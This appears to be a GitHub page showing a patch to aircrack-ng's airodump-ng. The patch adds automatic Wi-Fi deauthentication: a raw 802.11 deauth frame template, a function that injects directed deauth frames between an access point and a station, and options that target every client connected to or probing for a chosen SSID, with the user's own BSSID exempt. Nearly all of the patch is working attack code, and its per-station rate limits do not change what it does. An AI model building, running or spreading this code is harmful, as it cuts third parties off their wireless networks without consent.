-
Notifications
You must be signed in to change notification settings - Fork 10
/
aircrack-patch-airodump-deauth-r2404.patch
352 lines (322 loc) · 10.9 KB
/
aircrack-patch-airodump-deauth-r2404.patch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
Index: src/airodump-ng.c
===================================================================
--- src/airodump-ng.c (Revision 2404)
+++ src/airodump-ng.c (Arbeitskopie)
@@ -77,6 +77,11 @@
GCRY_THREAD_OPTION_PTHREAD_IMPL;
#endif
+
+#define DEAUTH_REQ \
+ "\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
+ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
+
void dump_sort( void );
void dump_print( int ws_row, int ws_col, int if_num );
@@ -643,6 +648,15 @@
" --ignore-negative-one : Removes the message that says\n"
" fixed channel <interface>: -1\n"
"\n"
+" Deauthentication options:\n"
+" --deauth-ssid <ssid>: Deauthenticate all stations probing\n"
+" for or being connected to ssid\n"
+" --deauth-not-mac <bssid>: Do not deauthenticate stations from\n"
+" bssid\n"
+" --deauth-min-rssi <rssi>: Only deauthenticate when received\n"
+" packet is stronger than given rssi\n"
+" --deauth-log <logfile>: Log every Deauthentication\n"
+"\n"
" Filter options:\n"
" --encrypt <suite> : Filter APs by cipher suite\n"
" --netmask <netmask> : Filter APs by mask\n"
@@ -1180,10 +1194,73 @@
return( 0 );
}
-int dump_add_packet( unsigned char *h80211, int caplen, struct rx_info *ri, int cardnum )
+
+int do_attack_deauth(unsigned char* bssid, unsigned char* sta, struct wif *wi)
{
- int i, n, seq, msd, dlen, offset, clen, o;
- uint z;
+ int i;
+ int aacks, sacks;
+ unsigned char buf[26];
+
+ /* deauthenticate the target */
+
+ memcpy( buf, DEAUTH_REQ, 26 );
+ memcpy( buf + 16, bssid, 6 );
+
+ aacks = 0;
+ sacks = 0;
+ for( i = 0; i < 4; i++ )
+ {
+ if(i == 0)
+ {
+ PCT; printf( "Sending 4 directed DeAuth. STMAC:"
+ " [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
+ sta[0], sta[1],
+ sta[2], sta[3],
+ sta[4], sta[5],
+ sacks, aacks );
+ }
+
+ memcpy( buf + 4, sta, 6 );
+ memcpy( buf + 10, bssid, 6 );
+
+ if (wi_write(wi, buf, 26, NULL) == -1) {
+ return( 1 );
+ }
+
+
+ usleep( 2000 );
+
+ memcpy( buf + 4, bssid, 6 );
+ memcpy( buf + 10, sta, 6 );
+
+ if (wi_write(wi, buf, 26, NULL) == -1) {
+ return( 1 );
+ }
+
+ usleep( 2000 );
+ }
+ printf("\n");
+ return( 0 );
+}
+
+/* check if given station probed for given SSID.
+ * does NOT handle SSIDs containing null bytes!
+ * returns 1 one match, 0 otherwise.
+ * */
+int probed_ssid_contains(struct ST_info *st, char *ssid)
+{
+ int i;
+ for(i = 0; i < NB_PRB; ++i)
+ {
+ if(strncmp(ssid, st->probes[i], st->ssid_length[i]) == 0)
+ return 1;
+ }
+ return 0;
+}
+
+int dump_add_packet( unsigned char *h80211, int caplen, struct rx_info *ri, int cardnum, struct wif *wi )
+{
+ int i, n, z, seq, msd, dlen, offset, clen, o;
int type, length, numuni=0, numauth=0;
struct pcap_pkthdr pkh;
struct timeval tv;
@@ -1501,6 +1578,7 @@
st_cur->tinit = time( NULL );
st_cur->tlast = time( NULL );
+ st_cur->tlast_deauth = 0;
st_cur->power = -1;
st_cur->rate_to = -1;
@@ -1511,6 +1589,7 @@
st_cur->lastseq = 0;
st_cur->qos_fr_ds = 0;
st_cur->qos_to_ds = 0;
+ st_cur->deauth_cnt = 0;
gettimeofday( &(st_cur->ftimer), NULL);
for( i = 0; i < NB_PRB; i++ )
@@ -1553,6 +1632,35 @@
st_cur->missed += msd;
}
st_cur->lastseq = seq;
+
+ /* handle station disassociation for every packet NOT targeted at our own AP.
+ * only target (connected) clients connected to AP with given SSID or probed that SSID.
+ */
+ if(G.do_sta_action && st_cur->base &&
+ (strncmp(ap_cur->essid, G.sta_action_essid, ap_cur->ssid_length) == 0 ||
+ probed_ssid_contains(st_cur, G.sta_action_essid)) &&
+ memcmp(ap_cur->bssid, G.sta_action_own_bssid, 6) != 0
+ )
+ { /* Also, only deauth at max once every five seconds and at most 10 times total
+ * as we do not want to do any harm! */
+ if(ri->ri_power > G.sta_action_min_ssi && ri->ri_power < -1 && st_cur->tlast_deauth < time(NULL) - 5 && st_cur->deauth_cnt < 10)
+ {
+ st_cur->tlast_deauth = time(NULL);
+ st_cur->deauth_cnt ++;
+ if(wi) {
+ do_attack_deauth(ap_cur->bssid, stmac, wi);
+ }
+
+ fprintf(G.f_sta_action, "%ld: %02X:%02X:%02X:%02X:%02X:%02X %02X:%02X:%02X:%02X:%02X:%02X %i %i\n", (long int)time(NULL),
+ ap_cur->bssid[0], ap_cur->bssid[1], ap_cur->bssid[2],
+ ap_cur->bssid[3], ap_cur->bssid[4], ap_cur->bssid[5],
+ stmac[0], stmac[1], stmac[2],
+ stmac[3], stmac[4], stmac[5],
+ ri->ri_channel, ri->ri_power);
+ fflush(G.f_sta_action);
+ }
+ }
+
}
st_cur->nb_pkt++;
@@ -2934,12 +3042,12 @@
int nlines, i, n, len;
char strbuf[512];
char buffer[512];
- char ssid_list[512];
+ char ssid_list[NB_PRB * 34 + 3];
struct AP_info *ap_cur;
struct ST_info *st_cur;
struct NA_info *na_cur;
int columns_ap = 83;
- int columns_sta = 74;
+ int columns_sta = 77;
int columns_na = 68;
int num_ap;
@@ -3316,7 +3424,7 @@
if(G.show_sta) {
memcpy( strbuf, " BSSID STATION "
- " PWR Rate Lost Frames Probes", columns_sta );
+ " PWR Rate Lost Frames DC Probes", columns_sta );
strbuf[ws_col - 1] = '\0';
fprintf( stderr, "%s\n", strbuf );
@@ -3432,7 +3540,7 @@
snprintf( strbuf, sizeof( strbuf ) - 1,
"%-256s", ssid_list );
strbuf[ws_col - (columns_sta - 6)] = '\0';
- fprintf( stderr, " %s", strbuf );
+ fprintf( stderr, " %2d %s", st_cur->deauth_cnt, strbuf);
}
fprintf( stderr, "\n" );
@@ -3513,7 +3621,7 @@
{
int i, j, n;
struct tm *ltime;
- char ssid_list[512];
+ char ssid_list[NB_PRB * 34 + 3];
struct AP_info *ap_cur;
struct ST_info *st_cur;
@@ -3644,7 +3752,7 @@
fprintf( G.f_txt,
"\r\nStation MAC, First time seen, Last time seen, "
- "Power, # packets, BSSID, Probed ESSIDs\r\n" );
+ "Power, # packets, BSSID, Probed ESSIDs, dc\r\n" );
st_cur = G.st_1st;
@@ -3710,7 +3818,7 @@
break;
}
- fprintf( G.f_txt, "%s\r\n", ssid_list );
+ fprintf( G.f_txt, "%s, %d\r\n", ssid_list, st_cur->deauth_cnt );
st_cur = st_cur->next;
}
@@ -5545,6 +5653,10 @@
{"netmask", 1, 0, 'm'},
{"bssid", 1, 0, 'd'},
{"essid", 1, 0, 'N'},
+ {"deauth-ssid", 1, 0, 'X'},
+ {"deauth-not-mac", 1, 0, 'Y'},
+ {"deauth-min-rssi", 1, 0, 'y'},
+ {"deauth-log", 1, 0, 'S'},
{"essid-regex", 1, 0, 'R'},
{"channel", 1, 0, 'c'},
{"gpsd", 0, 0, 'g'},
@@ -5644,6 +5756,9 @@
G.output_format_csv = 1;
G.output_format_kismet_csv = 1;
G.output_format_kismet_netxml = 1;
+ G.f_sta_action = NULL;
+ G.do_sta_action = 0;
+ G.sta_action_min_ssi = -1;
#ifdef HAVE_PCRE
G.f_essid_regex = NULL;
@@ -5726,7 +5841,7 @@
option_index = 0;
option = getopt_long( argc, argv,
- "b:c:egiw:s:t:u:m:d:N:R:aHDB:Ahf:r:EC:o:x:MU",
+ "b:c:egiw:s:t:u:m:d:N:R:aHDB:Ahf:r:EC:o:x:MUS:y:Y:X:",
long_options, &option_index );
if( option < 0 ) break;
@@ -5781,6 +5896,33 @@
G.show_manufacturer = 1;
break;
+ case 'S':
+ G.do_sta_action = 1;
+ G.f_sta_action = fopen(optarg, "wb");
+ if(!G.f_sta_action)
+ {
+ printf("Could not open sta_action file for writing!\n");
+ goto usage;
+ }
+ break;
+
+ case 'y':
+ G.sta_action_min_ssi = atoi(optarg);
+ break;
+
+ case 'Y':
+ if(getmac(optarg, 1, G.sta_action_own_bssid) != 0)
+ {
+ printf("Notice: invalid bssid for deauth filter\n");
+ printf("\"%s --help\" for help.\n", argv[0]);
+
+ return( 1 );
+ }
+ break;
+ case 'X':
+ strncpy(G.sta_action_essid, optarg, 31);
+ break;
+
case 'U' :
G.show_uptime = 1;
break;
@@ -6670,13 +6812,13 @@
read_pkts++;
wi_read_failed = 0;
- dump_add_packet( h80211, caplen, &ri, i );
+ dump_add_packet( h80211, caplen, &ri, i , wi[i]);
}
}
}
else if (G.s_file != NULL)
{
- dump_add_packet( h80211, caplen, &ri, i );
+ dump_add_packet( h80211, caplen, &ri, i, NULL );
}
}
Index: src/airodump-ng.h
===================================================================
--- src/airodump-ng.h (Revision 2404)
+++ src/airodump-ng.h (Arbeitskopie)
@@ -41,7 +41,7 @@
#define DEFAULT_CWIDTH 20 /* 20 MHz channels by default */
#define NB_PWR 5 /* size of signal power ring buffer */
-#define NB_PRB 10 /* size of probed ESSID ring buffer */
+#define NB_PRB 20 /* size of probed ESSID ring buffer */
#define MAX_CARDS 8 /* maximum number of cards to capture from */
@@ -268,7 +268,7 @@
struct ST_info *prev; /* the prev client in list */
struct ST_info *next; /* the next client in list */
struct AP_info *base; /* AP this client belongs to */
- time_t tinit, tlast; /* first and last time seen */
+ time_t tinit, tlast, tlast_deauth; /* first and last time seen */
unsigned long nb_pkt; /* total number of packets */
unsigned char stmac[6]; /* the client's MAC address */
char *manuf; /* the client's manufacturer */
@@ -285,6 +285,7 @@
struct WPA_hdsk wpa; /* WPA handshake data */
int qos_to_ds; /* does it use 802.11e to ds */
int qos_fr_ds; /* does it receive 802.11e */
+ int deauth_cnt;
};
/* linked list of detected macs through ack, cts or rts frames */
@@ -335,6 +336,7 @@
FILE *f_cap; /* output cap file */
FILE *f_ivs; /* output ivs file */
FILE *f_xor; /* output prga file */
+ FILE *f_sta_action; /* station action file/pipe */
char * batt; /* Battery string */
int channel[MAX_CARDS]; /* current channel # */
@@ -424,6 +426,11 @@
/* Airodump-ng start time: for kismet netxml file */
char * airodump_start_time;
+ int do_sta_action;
+ int sta_action_min_ssi;
+ char sta_action_essid[32];
+ unsigned char sta_action_own_bssid[6];
+
int output_format_pcap;
int output_format_csv;
int output_format_kismet_csv;